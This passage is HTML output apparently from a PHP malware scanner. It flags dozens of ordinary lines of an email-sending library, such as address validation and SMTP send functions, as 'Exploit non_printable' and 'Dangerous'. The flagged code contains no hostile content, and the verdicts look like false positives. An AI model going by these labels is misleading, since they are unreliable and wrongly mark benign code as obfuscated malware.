</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
